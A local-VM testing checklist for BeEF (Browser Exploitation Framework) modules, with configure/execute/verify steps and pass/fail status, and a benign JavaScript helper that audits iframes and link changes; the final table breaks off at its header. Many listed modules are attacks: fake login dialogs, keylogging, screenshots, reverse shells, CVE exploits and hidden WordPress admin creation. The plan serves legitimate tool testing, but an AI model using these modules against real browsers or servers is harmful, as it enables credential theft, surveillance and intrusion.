# BeEF Manual Testing Plan (Local VM Edition)

This document provides a simplified approach for manually testing BeEF modules entirely within the same Linux Ubuntu VM where BeEF is running.

## 1. Environment Setup (Local VM)

### 1.1 BeEF Server

1. **Dependencies**: Already installed via `./install`.
2. **Configuration**: Credentials have been updated in `config.yaml`.
3. **Launch**: Run `./beef` from the repository root.
4. **Access**: Open the local browser (e.g., Firefox) and navigate to the BeEF UI: `http://127.0.0.1:3000/ui/panel`.

### 1.2 Hooked Browsers (Local)

For local testing on the same machine:

1. Open a new tab or window in your browser (Firefox, Chromium, etc.).
2. Navigate to the hook demo page: `http://127.0.0.1:3000/demos/butcher/index.html`.
3. The browser will appear in the BeEF "Online Browsers" list as `127.0.0.1`.

## 2. Testing Strategy: Grouped Execution

1. **Phase 1: Common Infrastructure (Firefox)**: Start here. These modules work on the standard Linux/Firefox setup provided by the VM and don't require external devices or specific insecure software.
2. **Phase 2: Specific Requirements (Firefox)**: Test these if you have the specific requirements (e.g., Android device, Flash plugin, specific vulnerable server running).
3. **Phase 3: Other Browsers**: Use Chrome/Edge/Safari for modules that explicitly don't work in Firefox.

## 3. Module Inventory and Instructions

### 3.1 Phase 1: Common Infrastructure (Standard Firefox)

Test these modules using **Firefox** on your local Linux VM. They leverage standard browser features or the BeEF infrastructure itself.

| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [x] | **Alert Dialog** | 1. Set `Title`, `Message`, and `Button name`.<br>2. Execute module.<br>3. Verify alert dialog appears on hooked page with configured text. | None. | |
| [x] | **BlockUI Modal Dialog** | 1. Set `Message` and `Timeout (s)`.<br>2. Execute module.<br>3. Verify blocking overlay appears with message.<br>4. Wait for timeout or use UnBlockUI to remove. | None. | |
| [x] | **Clickjacking** | 1. Set `iFrame Src` to target page for clickjacking.<br>2. Execute module.<br>3. Verify page shows overlay for click-based attack.<br>4. Click as user would to test interaction capture. | None. | |
| [x] | **Confirm Close Tab** | 1. Configure: `Confirm text`, `Create a pop-under window on user`<br>2. Click Execute.<br><br>_Shows a confirm dialog to the user when they try to close a tab._ | Close tab/window. Check for residual pop-unders. | A window pops up, but the text is not as configured. |
| [x] | **Create Foreground iFrame** | 1. Execute module.<br>2. Click "Our Meaty Friends" button to reveal links.<br>3. Click any link (e.g., "The Browser Exploitation Framework Project homepage").<br>4. Verify page loads in fullscreen iFrame overlay (check DevTools for `<iframe>` with `z-index:1` and 100% width/height).<br>5. Confirm hook remains active in BeEF UI. | Close tab/window. | |
| [x] | **Create Invisible Iframe** | 1. Set `URL` to any valid URL (e.g., `http://example.com`).<br>2. Execute module.<br>3. Open DevTools → Elements → search for `<iframe>` with `visibility:hidden` or `display:none`.<br>4. Verify iframe exists with correct src. | None. | |
| [x] | **Create Pop Under** | 1. Set `Clickjack` to `on` (waits for click) or `off` (immediate).<br>2. Execute module.<br>3. If Clickjack=on, click anywhere on page.<br>4. Check for small hidden window in taskbar (or DevTools: new window to `/demos/plain.html`).<br>5. Verify BeEF shows 2nd hooked browser. | Close pop-under window. | |
| [-] | **Cross-Origin Scanner (CORS)** | 1. Set `Scan IP range` (e.g., `127.0.0.1-127.0.0.1`) and `Ports` (e.g., `80,443,8080`).<br>2. Execute module.<br>3. Check command results for list of discovered web servers allowing CORS. | None. | See [CORS-001](testing_errors.md#cors-001-cross-origin-scanner-cors-module-error) |
| [x] | **DNS Enumeration** | 1. Configure: `DNS (comma separated)`, `Timeout (ms)`<br>2. Click Execute.<br><br>_Discover DNS hostnames within the victim's network using dictionary and timing attacks._ | None. | |
| [x] | **DOSer** | 1. Set `URL` to `http://127.0.0.1:3000/demos/plain.html`.<br>2. Set `Delay between requests (ms)` to `100`.<br>3. Set `HTTP Method` to `GET`.<br>4. Execute module.<br>5. Wait for status report in results (appears every 10s: "Requests sent: X").<br>6. Verify ongoing requests in browser DevTools → Network tab. | Refresh hooked page to stop worker. | |
| [-] | **Detect Extensions** | 1. Execute module.<br>2. Check command results for list of detected Chrome/Firefox extensions. | None. | See [EXT-001](testing_errors.md#ext-001-detect-extensions-module-failure) |
| [x] | **Detect MIME Types** | 1. Click Execute.<br><br>_This module retrieves the browser's supported MIME types._ | None. | |
| [x] | **Detect Popup Blocker** | 1. Execute module.<br>2. Check command result: "Popup blocker enabled" or "Popup blocker not detected". | None. | |
| [x] | **Fetch Port Scanner** | 1. Set `Scan IP or Hostname` (e.g., `127.0.0.1`) and `Specific port(s)` (e.g., `22,80,443,3000`).<br>2. Execute module.<br>3. Check command results for open/closed port status. | None. | |
| [-] | **Fingerprint Browser (PoC)** | 1. Execute module.<br>2. Check command results for browser name, version, and platform. | None. | See [FP-001](testing_errors.md#fp-001-fingerprint-browser-poc-module-failure) |
| [x] | **Fingerprint Browser** | 1. Execute module.<br>2. Check command results for detailed fingerprint (canvas, WebGL, fonts, plugins, etc.). | None. | |
| [-] | **Fingerprint Local Network** | 1. Run `hostname -I` to find your IP (e.g., `192.168.1.5`).<br>2. Set `Scan IP range` to `common` (or specific IP).<br>3. Open Browser DevTools → Network tab.<br>4. Execute module.<br>5. **Verify**: You will see many requests in DevTools (red/failed is normal).<br>6. **Duration**: `common` scan takes ~10-30s. Full /24 scan takes minutes.<br>7. Check BeEF results for any detected devices. | Refresh page to stop early. | See [NET-001](testing_errors.md#net-001-fingerprint-local-network-no-feedback) |
| [-] | **Fingerprint Routers** | 1. Click Execute.<br><br>_This module attempts to discover network routers on the local network._ | None. | See [NET-002](testing_errors.md#net-002-fingerprint-routers-module-error) |
| [x] | **Get Geolocation (API)** | 1. Execute module.<br>2. Allow/deny location permission in browser popup.<br>3. If allowed, check results for latitude/longitude coordinates. | None. | |
| [ ] | **Get HTTP Servers (Favicon)** | 1. Configure: `Remote IP(s)`, `Ports`, `Workers`...<br>2. Click Execute.<br><br>_Attempts to discover HTTP servers on the specified IP range by checking for a favicon._ | None. | |
| [ ] | **Get Internal IP WebRTC** | 1. Execute module.<br>2. Check command results for local/private IP address (e.g., `192.168.x.x`). | None. | |
| [ ] | **Get Protocol Handlers** | 1. Configure: `Link Protocol(s)`, `Link Address`<br>2. Click Execute.<br><br>_This module attempts to identify protocol handlers present on the hooked browser._ | None. | |
| [ ] | **Get Visited Domains** | 1. Configure: `Specify custom page to check`<br>2. Click Execute.<br><br>_Performs rapid history extraction through non-destructive cache timing._ | None. | |
| [ ] | **Hijack Opener Window** | 1. First open demo page via a link from another page (so `window.opener` exists).<br>2. Execute module on the opened tab.<br>3. Check if opener window's location changed to BeEF `/iframe#` URL.<br>4. Verify result in command output. | Close affected windows. | |
| [ ] | **Identify LAN Subnets** | 1. Configure: `Timeout for each request (ms)`<br>2. Click Execute.<br><br>_Discover active hosts in the internal network(s) of the hooked browser._ | None. | |
| [ ] | **Lcamtuf Download** | 1. Configure: `Real File Path`, `Malicious File Path`, `Run Once`<br>2. Click Execute.<br><br>_This module will attempt to execute a lcamtuf download._ | Delete downloaded files. | |
| [ ] | **Link Rewrite** | 1. Execute module.<br>2. Click "Our Meaty Friends" button to reveal links.<br>3. Hover over any link and check DevTools or status bar.<br>4. Verify all `href` attributes have been modified. | Refresh page to restore links. | |
| [ ] | **Man-In-The-Browser** | 1. Execute module.<br>2. Click any link on page to navigate.<br>3. Verify page loads via AJAX (URL bar may not change, or content loads dynamically).<br>4. Confirm BeEF hook remains active.<br>5. Check command result shows "Browser hooked". | Close tab. | |
| [ ] | **No Sleep** | 1. Click Execute.<br><br>_This module uses NoSleep.js to prevent display sleep and enable wake lock in any Android or iOS web browser._ | None. | |
| [ ] | **Ping Sweep (FF)** | 1. Configure: `Scan IP range (C class or IP)`, `Timeout (ms)`, `Delay between requests (ms)`<br>2. Click Execute.<br><br>_Discover active hosts in the internal network of the hooked browser._ | None. | |
| [ ] | **Ping Sweep (JS XHR)** | 1. Configure: `Scan IP range (C class)`, `Workers`<br>2. Click Execute.<br><br>_Discover active hosts in the internal network of the hooked browser using JavaScript XHR._ | None. | |
| [ ] | **Play Sound** | 1. Set `Sound File Path` to a valid audio URL (e.g., `/demos/alert.mp3` or external URL).<br>2. Execute module.<br>3. Listen for audio playback on hooked browser. | None. | |
| [ ] | **Port Scanner (Multiple Methods)** | 1. Set `Scan IP or Hostname` (e.g., `127.0.0.1`) and `Specific port(s)` (e.g., `22,80,443,3000`).<br>2. Execute module.<br>3. Check results for open ports (tries WebSockets, CORS, img tags). | None. | |
| [ ] | **Pretty Theft** | 1. Set `Dialog Type` (e.g., `Facebook`, `LinkedIn`, `Windows`, `Generic`).<br>2. Set `Backing` (e.g., `Grey`, `Clear`).<br>3. Execute module.<br>4. Verify fake login dialog appears on hooked page.<br>5. Enter test credentials and submit.<br>6. Check BeEF command results for captured credentials. | None. | |
| [ ] | **Raw JavaScript** | 1. Set `Javascript Code` (e.g., `alert('test')` or `console.log(document.cookie)`).<br>2. Execute module.<br>3. Verify JS executed (alert shown, or check DevTools console). | None. | |
| [ ] | **Redirect Browser (Rickroll)** | 1. Execute module.<br>2. Verify page is replaced with fullscreen Rickroll video.<br>3. Confirm hook remains active in BeEF UI. | Refresh page to restore. | |
| [ ] | **Redirect Browser (Standard)** | 1. Set `Redirect URL` (e.g., `https://example.com`).<br>2. Execute module.<br>3. Verify browser navigates to specified URL (hook will be lost). | Re-hook if needed. | |
| [ ] | **Redirect Browser (iFrame)** | 1. Set `Redirect URL`, optional `Title` and `Favicon`.<br>2. Execute module.<br>3. Verify page shows iFrame overlay with target URL.<br>4. Confirm hook remains active. | Close tab. | |
| [ ] | **Replace Videos (Fake Plugin)** | 1. Configure: `Payload URL`, `jQuery Selector`<br>2. Click Execute.<br><br>_Replaces an object selected with jQuery with an image advising the user to install a missing plugin._ | None. | |
| [ ] | **Resource Exhaustion DoS** | 1. Execute module.<br>2. Observe browser becoming slow/unresponsive.<br>3. May need to force-close browser tab/window. | Force-close tab if needed. | |
| [ ] | **Return Ascii Chars** | 1. Execute module.<br>2. Check command results for ASCII character set. | None. | |
| [ ] | **Return Image** | 1. Execute module.<br>2. Check command results for base64-encoded PNG image data. | None. | |
| [ ] | **Simple Hijacker** | 1. Configure: `Targetted domains`, `Template to use`<br>2. Click Execute.<br><br>_Hijack clicks on links to display what you want._ | None. | |
| [ ] | **Spoof Address Bar (data URL)** | 1. Configure: `Spoofed URL`, `Real URL`<br>2. Click Execute.<br><br>_This module redirects the browser to a legitimate-looking URL with a data scheme._ | None. | |
| [ ] | **Spyder Eye** | 1. Set `Repeat` (number of screenshots) and `Delay` (ms between shots).<br>2. Execute module.<br>3. Check command results for base64-encoded screenshot(s) of the victim's viewport. | None. | |
| [ ] | **TabNabbing** | 1. Set `URL` (e.g., fake login page) and `Wait` time (e.g., 1 minute).<br>2. Execute module.<br>3. Switch to a different tab and wait the configured time.<br>4. Switch back and verify the hooked tab has navigated to specified URL. | Close tab. | |
| [ ] | **Test CORS Request** | 1. Configure: `Method`, `URL`, `Data`<br>2. Click Execute.<br><br>_Test the beef.net.cors.request function._ | None. | |
| [ ] | **Test HTTP Redirect** | 1. Click Execute.<br><br>_Test the HTTP 'redirect' handler._ | None. | |
| [ ] | **Test JS variable passing** | 1. Configure: `Payload Name`<br>2. Click Execute.<br><br>_Test for JS variable passing._ | None. | |
| [ ] | **Test Network Request** | 1. Configure: `Scheme`, `Method`, `Domain`...<br>2. Click Execute.<br><br>_Test the beef.net.request function by retrieving a URL._ | None. | |
| [ ] | **Test Returning Results** | 1. Configure: `Times to repeat`, `String to repeat`<br>2. Click Execute.<br><br>_This module will return a string of the specified length._ | None. | |
| [ ] | **Test beef.debug()** | 1. Configure: `Debug Message`<br>2. Click Execute.<br><br>_Test the 'beef.debug()' function._ | None. | |
| [ ] | **Text to Voice** | 1. Set `Text` (e.g., "Hello world") and `Language` (e.g., `en`).<br>2. Execute module.<br>3. Listen for audio playback of the text. | None. | |
| [ ] | **UnBlockUI** | 1. First execute "BlockUI Modal Dialog" module to create a blocking overlay.<br>2. Then execute this "UnBlockUI" module.<br>3. Verify the BlockUI overlay is removed. | None. | |
| [ ] | **Unhook** | 1. Execute module.<br>2. Verify hook JavaScript is removed from page (check DevTools console).<br>3. Confirm browser goes "Offline" in BeEF UI.<br>4. Confirm no further commands can be executed. | Re-hook page if needed. | |
| [ ] | **iFrame Event Key Logger** | 1. Set `iFrame Src` (target URL to load in overlay).<br>2. Set `Send Back Interval` (e.g., 5000ms).<br>3. Execute module.<br>4. Type in the iFrame overlay.<br>5. Check BeEF command results for captured keystrokes. | Close tab. | |
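The DevTools checks in the rows above (Create Invisible Iframe, Create Foreground iFrame, Link Rewrite) can be scripted from the hooked tab's console. The helper below is an added example written for this plan, not BeEF code: the audit functions take plain element descriptors so they also run under Node, while the `collect*` adapters build those descriptors from the live `document`. The descriptor shape, function names and sample URLs are this helper's own assumptions.

```javascript
// Added verification helper (not part of BeEF). Audits the hooked demo page
// for the side effects the Phase 1 checks look for: iframes hidden by CSS,
// full-viewport overlay iframes, and rewritten link targets.

// Constructed sample page state (not captured from a real session): one
// CSS-hidden iframe, one fullscreen overlay, one ordinary visible iframe.
const SAMPLE_IFRAMES = [
  { src: 'http://example.com/',
    style: { visibility: 'hidden', display: 'block', position: 'static',
             zIndex: 'auto', width: '300px', height: '150px' } },
  { src: 'http://127.0.0.1:3000/demos/plain.html',
    style: { visibility: 'visible', display: 'block', position: 'fixed',
             zIndex: '1', width: '100%', height: '100%' } },
  { src: 'about:blank',
    style: { visibility: 'visible', display: 'block', position: 'static',
             zIndex: 'auto', width: '300px', height: '150px' } },
];

// Constructed link snapshots: only the first anchor was rewritten, so the
// check must report a partial rewrite rather than success.
const LINKS_BEFORE = [
  { text: 'Project homepage', href: 'https://example.org/project' },
  { text: 'Demo page', href: 'http://127.0.0.1:3000/demos/plain.html' },
];
const LINKS_AFTER = [
  { text: 'Project homepage', href: 'http://127.0.0.1:3000/demos/plain.html#rewritten' },
  { text: 'Demo page', href: 'http://127.0.0.1:3000/demos/plain.html' },
];

// Create Invisible Iframe check: hidden by CSS or collapsed to zero size.
function isHiddenIframe(frame) {
  const s = frame.style;
  return s.visibility === 'hidden' || s.display === 'none' ||
         parseFloat(s.width) === 0 || parseFloat(s.height) === 0;
}

// A dimension covers the viewport if it is literally 100% or, when the
// viewport size is known, at least as large in px (getComputedStyle gives px).
function coversDimension(value, viewportPx) {
  if (value === '100%') return true;
  return viewportPx !== undefined && parseFloat(value) >= viewportPx;
}

// Create Foreground iFrame check: positioned, stacked above the page
// (z-index >= 1) and covering the whole viewport.
function isOverlayIframe(frame, viewport) {
  const s = frame.style;
  const positioned = s.position === 'fixed' || s.position === 'absolute';
  const stacked = parseInt(s.zIndex, 10) >= 1;
  return positioned && stacked &&
         coversDimension(s.width, viewport && viewport.width) &&
         coversDimension(s.height, viewport && viewport.height);
}

function auditIframes(frames, viewport) {
  const report = { hidden: [], overlay: [], visible: [] };
  for (const f of frames) {
    if (isHiddenIframe(f)) report.hidden.push(f.src);
    else if (isOverlayIframe(f, viewport)) report.overlay.push(f.src);
    else report.visible.push(f.src);
  }
  return report;
}

// Link Rewrite check: compare snapshots taken before and after Execute.
// Anchors are matched by document order, so a changed anchor count is
// flagged rather than silently paired up.
function diffLinks(before, after) {
  const total = Math.min(before.length, after.length);
  const changed = [];
  for (let i = 0; i < total; i++) {
    if (before[i].href !== after[i].href) {
      changed.push({ text: after[i].text, from: before[i].href, to: after[i].href });
    }
  }
  return { total, changed, allRewritten: total > 0 && changed.length === total,
           countMismatch: before.length !== after.length };
}

// Browser adapters: paste into the hooked tab's DevTools console, take
// collectLinks() before Execute, then compare with a second snapshot.
function collectIframes(doc = document) {
  return Array.from(doc.querySelectorAll('iframe')).map((el) => {
    const cs = doc.defaultView.getComputedStyle(el);
    return { src: el.src, style: { visibility: cs.visibility, display: cs.display,
             position: cs.position, zIndex: cs.zIndex, width: cs.width, height: cs.height } };
  });
}
function collectLinks(doc = document) {
  return Array.from(doc.querySelectorAll('a[href]'))
    .map((el) => ({ text: el.textContent.trim(), href: el.href }));
}
function currentViewport(win = window) {
  return { width: win.innerWidth, height: win.innerHeight };
}

// Node stand-alone run: audit the constructed samples.
if (typeof document === 'undefined') {
  console.log(auditIframes(SAMPLE_IFRAMES), diffLinks(LINKS_BEFORE, LINKS_AFTER));
}
```

In the console, `auditIframes(collectIframes(), currentViewport())` should list the module's URL under `hidden` or `overlay`, and `diffLinks(before, collectLinks()).allRewritten` should be `true` after Link Rewrite.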
### 3.2 Phase 2: Specific Requirements (Firefox)

These modules require specific devices, plugins, vulnerable software, or valid credentials to work.

#### 3.2.1 Mobile & PhoneGap

Requires an Android/iOS device or PhoneGap environment.

| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **Alert User** | 1. Click Execute.<br><br>_Show user an alert. This module requires the PhoneGap API._ | None. | |
| [ ] | **Beep** | 1. Click Execute.<br><br>_Make the phone beep. This module requires the PhoneGap API._ | None. | |
| [ ] | **Check Connection** | 1. Click Execute.<br><br>_Find out the network connection type, e.g., Wifi, 3G. This module requires the PhoneGap API._ | None. | |
| [ ] | **Detect PhoneGap** | 1. Click Execute.<br><br>_Detects if the PhoneGap API is present._ | None. | |
| [ ] | **Geolocation** | 1. Click Execute.<br><br>_Geolocate your victim. This module requires the PhoneGap API._ | None. | |
| [ ] | **Get Network Connection Type** | 1. Click Execute.<br><br>_Retrieve the network connection type (wifi, 3G, etc.). Note: Android only._ | None. | |
| [ ] | **Globalization Status** | 1. Click Execute.<br><br>_Examine device locale settings. This module requires the PhoneGap API._ | None. | |
| [ ] | **Keychain** | 1. Configure: `Service name`, `Key`, `Value`...<br>2. Click Execute.<br><br>_Read/Create/Update/Delete Keychain elements. This module requires the PhoneGap API._ | None. | |
| [ ] | **List Contacts** | 1. Click Execute.<br><br>_Examine device contacts. This module requires the PhoneGap API._ | None. | |
| [ ] | **List Files** | 1. Configure: `Directory`<br>2. Click Execute.<br><br>_Examine device file system. This module requires the PhoneGap API._ | None. | |
| [ ] | **List Plugins** | 1. Click Execute.<br><br>_Attempts to guess installed plugins. This module requires the PhoneGap API._ | None. | |
| [ ] | **Persist resume** | 1. Click Execute.<br><br>_Persist over application sleep/wake events. This module requires the PhoneGap API._ | None. | |
| [ ] | **Persistence (PhoneGap)** | 1. Configure: `Hook URL`<br>2. Click Execute.<br><br>_Insert the BeEF hook into PhoneGap's index.html (iPhone only). This module requires the PhoneGap API._ | None. | |
| [ ] | **Prompt User** | 1. Configure: `Title`, `Question`, `Yes`...<br>2. Click Execute.<br><br>_Ask device user a question. This module requires the PhoneGap API._ | None. | |
| [ ] | **Start Recording Audio** | 1. Configure: `File Name`<br>2. Click Execute.<br><br>_Start recording audio. This module requires the PhoneGap API._ | None. | |
| [ ] | **Stop Recording Audio** | 1. Click Execute.<br><br>_Stop recording audio. This module requires the PhoneGap API._ | None. | |
| [ ] | **Track Physical Movement** | 1. Click Execute.<br><br>_This module will track the physical movement of the user's device._ | None. | |
| [ ] | **Upload File** | 1. Configure: `Destination`, `File Path`<br>2. Click Execute.<br><br>_Upload files from device to a server of your choice. This module requires the PhoneGap API._ | None. | |

#### 3.2.2 Legacy Plugins (Flash, Java, Silverlight, etc.)

Requires the specific plugin to be installed and enabled in the browser.

| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **Cross-Origin Scanner (Flash)** | 1. Configure: `Scan IP range (C class)`, `Ports`, `Workers`...<br>2. Click Execute.<br><br>_Scans an IP range... This module uses ContentHijacking.swf._ | None. | |
| [ ] | **Detect Foxit Reader** | 1. Click Execute.<br><br>_This module will check if the browser has the Foxit Reader plugin._ | None. | |
| [ ] | **Detect QuickTime** | 1. Click Execute.<br><br>_This module will check if the browser has QuickTime support._ | None. | |
| [ ] | **Detect RealPlayer** | 1. Click Execute.<br><br>_This module will check if the browser has RealPlayer support._ | None. | |
| [ ] | **Detect Silverlight** | 1. Click Execute.<br><br>_This module will check if the browser has Silverlight support._ | None. | |
| [ ] | **Detect Unity Web Player** | 1. Click Execute.<br><br>_Detects Unity Web Player._ | None. | |
| [ ] | **Detect VLC** | 1. Click Execute.<br><br>_This module will check if the browser has the VLC plugin._ | None. | |
| [ ] | **Detect Windows Media Player** | 1. Click Execute.<br><br>_This module will check if the browser has the Windows Media Player plugin installed._ | None. | |
| [ ] | **Get Internal IP (Java)** | 1. Configure: `Number`<br>2. Click Execute.<br><br>_Retrieve the local network interface IP address of the victim machine using an unsigned Java applet._ | None. | |
| [ ] | **Get System Info (Java)** | 1. Click Execute.<br><br>_This module will retrieve basic information about the host system using an unsigned Java applet._ | None. | |
| [ ] | **Webcam (Flash)** | 1. Configure: `Social Engineering Title`...<br>2. Click Execute.<br><br>_Shows the Adobe Flash 'Allow Webcam' dialog._ | None. | |
| [ ] | **Webcam Permission Check** | 1. Click Execute.<br><br>_Checks if the user has allowed the BeEF domain to access Camera/Mic with Flash._ | None. | |

#### 3.2.3 Specific Target Software / Services

Requires specific vulnerable software or a service to be running and accessible (e.g., Apache, JBoss, printers).

| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **Apache Cookie Disclosure** | 1. Click Execute.<br><br>_Exploits CVE-2012-0053. Requires Apache HTTP Server 2.2.0 through 2.2.21._ | Clear browser cookies. | |
| [ ] | **Apache Felix Remote Shell** | 1. Configure: `Target Host`, `Target Port`...<br>2. Click Execute.<br><br>_Attempts to get a reverse shell on an Apache Felix Remote Shell server._ | None. | |
| [ ] | **Bindshell (POSIX)** | 1. Configure: `Target Address`, `Target Port`, `Timeout (s)`...<br>2. Click Execute.<br><br>_Sends commands to a listening POSIX shell._ | None. | |
| [ ] | **Bindshell (Windows)** | 1. Configure: `Target Address`, `Target Port`, `Timeout (s)`...<br>2. Click Execute.<br><br>_Sends commands to a listening Windows shell._ | None. | |
| [ ] | **ColdFusion Directory Traversal** | 1. Configure: `Retrieve file`, `CF server OS`...<br>2. Click Execute.<br><br>_Exploits directory traversal in ColdFusion 8/9._ | None. | |
| [ ] | **Cross-Site Faxing (XSF)** | 1. Configure: `Target Address`, `Target Port`...<br>2. Click Execute.<br><br>_Sends commands to an ActiveFax RAW server socket._ | None. | |
| [ ] | **Cross-Site Printing (XSP)** | 1. Configure: `Target Address`, `Target Port`...<br>2. Click Execute.<br><br>_Sends a message to a listening print port (9100)._ | None. | |
| [ ] | **Detect Airdroid** | 1. Configure: `IP or Hostname`, `Port`<br>2. Click Execute.<br><br>_Attempts to detect the Airdroid application for Android running on localhost._ | None. | |
| [ ] | **Detect Burp** | 1. Run Burp Suite with browser proxied through it.<br>2. Execute module.<br>3. Check if Burp is detected (result shows "Burp detected" or similar). | None. | |
| [ ] | **Detect CUPS** | 1. Configure: `IP or Hostname`, `Port`<br>2. Click Execute.<br><br>_Attempts to detect Common UNIX Printing System (CUPS) on localhost._ | None. | |
| [ ] | **Detect Coupon Printer** | 1. Click Execute.<br><br>_Attempts to detect Coupon Printer on localhost._ | None. | |
| [ ] | **Detect Ethereum ENS** | 1. Configure: `Image resource`...<br>2. Click Execute.<br><br>_Detects if using Ethereum ENS resolvers._ | None. | |
| [ ] | **Detect Google Desktop** | 1. Click Execute.<br><br>_Attempts to detect Google Desktop running on the default port 4664._ | None. | |
| [ ] | **Detect OpenNIC DNS** | 1. Configure: `Image resource`...<br>2. Click Execute.<br><br>_Detects if using OpenNIC DNS resolvers._ | None. | |
| [ ] | **EXTRAnet Collaboration Tool** | 1. Configure: `Remote Host`, `Remote Port`...<br>2. Click Execute.<br><br>_Exploits command execution in the 'admserver' component._ | None. | |
| [ ] | **Farsite X25 gateway** | 1. Configure: `HTTP(s)`, `Remote Host`...<br>2. Click Execute.<br><br>_Exploits CVE-2014-7175/7173 to execute code._ | None. | |
| [ ] | **Firephp 0.7.1 RCE** | 1. Click Execute.<br><br>_Exploit FirePHP <= 0.7.1._ | None. | |
| [ ] | **Get Wireless Keys** | 1. Click Execute.<br><br>_Retrieve wireless profiles (Windows Vista and Windows 7 only)._ | None. | |
| [ ] | **Get ntop Network Hosts** | 1. Configure: `Remote Host`, `Remote Port`<br>2. Click Execute.<br><br>_Retrieves information from ntop (unauthenticated)._ | None. | |
| [ ] | **GlassFish WAR Upload** | 1. Configure: `Host`, `Filename`...<br>2. Click Execute.<br><br>_Attempts to deploy a malicious WAR file on GlassFish Server 3.1.1._ | None. | |
| [ ] | **GroovyShell Server** | 1. Configure: `Remote Host`, `Remote Port`...<br>2. Click Execute.<br><br>_Uses the GroovyShell Server interface to execute commands._ | None. | |
| [ ] | **Hook Default Browser** | 1. Configure: `URL`<br>2. Click Execute.<br><br>_This module will use a PDF to attempt to hook the default browser._ | None. | |
| [ ] | **HP uCMDB 9.0x add user** | 1. Configure: `Protocol`, `Host`, `Port`...<br>2. Click Execute.<br><br>_Attempts to add users to HP uCMDB._ | None. | |
| [ ] | **IBM iNotes (Extract List)** | 1. Click Execute.<br><br>_Extracts iNotes contact list._ | None. | |
| [ ] | **IBM iNotes (Flooder)** | 1. Configure: `To`, `Subject`, `Body`, `Count`...<br>2. Click Execute.<br><br>_Floods an email address from the victim's account._ | None. | |
| [ ] | **IBM iNotes (Read)** | 1. Click Execute.<br><br>_Read a note from the victim's IBM iNotes._ | None. | |
| [ ] | **IBM iNotes (Send)** | 1. Configure: `To`, `Subject`, `Body`<br>2. Click Execute.<br><br>_Sends an email from the victim's account._ | None. | |
| [ ] | **IBM iNotes (Send w/ Attachment)** | 1. Configure: `To`, `Subject`, `Body`, `File`...<br>2. Click Execute.<br><br>_Sends an email with attachment from the victim's account._ | None. | |
| [ ] | **IMAP** | 1. Configure: `IMAP Server`, `Port`, `Commands`<br>2. Click Execute.<br><br>_Sends commands to an IMAP4 server._ | None. | |
| [ ] | **IRC** | 1. Configure: `IRC Server`, `Port`, `Username`...<br>2. Click Execute.<br><br>_Connects to an IRC server and sends messages._ | None. | |
| [ ] | **IRC NAT Pinning** | 1. Configure: `Connect to`, `Private IP`, `Private Port`<br>2. Click Execute.<br><br>_Attempts to open closed ports on stateful firewalls compatible with IRC tracking._ | None. | |
| [ ] | **Jboss 6.0.0M1 JMX Deploy** | 1. Configure: `Remote Target Host`...<br>2. Click Execute.<br><br>_Deploy a JSP reverse or bind shell using JMX._ | None. | |
| [ ] | **Jenkins Code Exec CSRF** | 1. Configure: `Remote Host`, `Target URI`...<br>2. Click Execute.<br><br>_Attempts to get a reverse shell from the Jenkins Groovy Script console._ | None. | |
| [ ] | **Kemp LoadBalancer RCE** | 1. Configure: `URL`, `Remote Port`...<br>2. Click Execute.<br><br>_Exploits RCE in Kemp LoadBalancer 7.1-16._ | None. | |
| [ ] | **QEMU Monitor 'migrate'** | 1. Configure: `Remote Host`, `Remote Port`...<br>2. Click Execute.<br><br>_Attempts to get a reverse shell from the QEMU monitor service._ | None. | |
| [ ] | **QNX QCONN Command Exec** | 1. Configure: `Remote Host`, `Remote Port`...<br>2. Click Execute.<br><br>_Exploits a vulnerability in the qconn component of QNX Neutrino._ | None. | |
| [ ] | **RFI Scanner** | 1. Configure: `Target Protocol`, `Target Host`...<br>2. Click Execute.<br><br>_Scans a web server for RFI vulnerabilities._ | None. | |
| [ ] | **Redis** | 1. Configure: `Target Address`, `Target Port`...<br>2. Click Execute.<br><br>_Sends commands to a listening Redis daemon._ | None. | |
| [ ] | **Shell Shock (CVE-2014-6271)** | 1. Configure: `Target`, `HTTP Method`...<br>2. Click Execute.<br><br>_Attempts to use vulnerability CVE-2014-6271 to execute arbitrary code._ | None. | |
| [ ] | **Shell Shock Scanner** | 1. Configure: `HTTP Method`, `Target Protocol`...<br>2. Click Execute.<br><br>_Attempts to get a reverse shell by requesting ~400 potentially vulnerable CGI scripts._ | None. | |
| [ ] | **VTiger CRM Upload Exploit** | 1. Configure: `Target Web Server`...<br>2. Click Execute.<br><br>_Uploads and executes a reverse shell on VTiger CRM 5.0.4._ | None. | |
| [ ] | **WAN Emulator Command Exec** | 1. Configure: `Target Host`, `Target Port`...<br>2. Click Execute.<br><br>_Attempts to get a reverse root shell on a WAN Emulator server._ | None. | |
| [ ] | **WordPress Add User** | 1. Configure: `Username`, `Pwd`, `Email`...<br>2. Click Execute.<br><br>_Adds a WordPress user._ | None. | |
| [ ] | **WordPress Add Administrator** | 1. Configure: `Username:`, `Pwd:`...<br>2. Click Execute.<br><br>_Stealthily adds a WordPress administrator account._ | Close tab/window. Check for residual pop-unders. | |
| [ ] | **WordPress Current User** | 1. Click Execute.<br><br>_Get the currently logged-in user's information._ | None. | |
| [ ] | **WordPress Upload RCE (Plugin)** | 1. Configure: `Auth Key`<br>2. Click Execute.<br><br>_Attempts to upload and activate a malicious WordPress plugin._ | None. | |
| [ ] | **Wordpress Post-Auth RCE** | 1. Configure: `Target Web Server`<br>2. Click Execute.<br><br>_Attempts to upload and activate a malicious WordPress plugin._ | None. | |
| [ ] | **Zenoss 3.x Add User** | 1. Configure: `Zenoss web root`...<br>2. Click Execute.<br><br>_Attempts to add a user to a Zenoss Core 3.x server._ | None. | |
| [ ] | **Zenoss 3.x Command Exec** | 1. Configure: `Target Host`, `Target Port`...<br>2. Click Execute.<br><br>_Attempts to get a reverse shell on a Zenoss 3.x server._ | None. | |
| [ ] | **ruby-nntpd Command Exec** | 1. Configure: `Remote Host`, `Remote Port`...<br>2. Click Execute.<br><br>_Uses the 'eval' verb in ruby-nntpd 0.01dev to execute commands._ | None. | |

#### 3.2.4 Social Engineering / Account Phishing

Requires the user to be logged into valid accounts (Gmail, Facebook, etc.) or susceptible to specific social engineering tricks.

| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
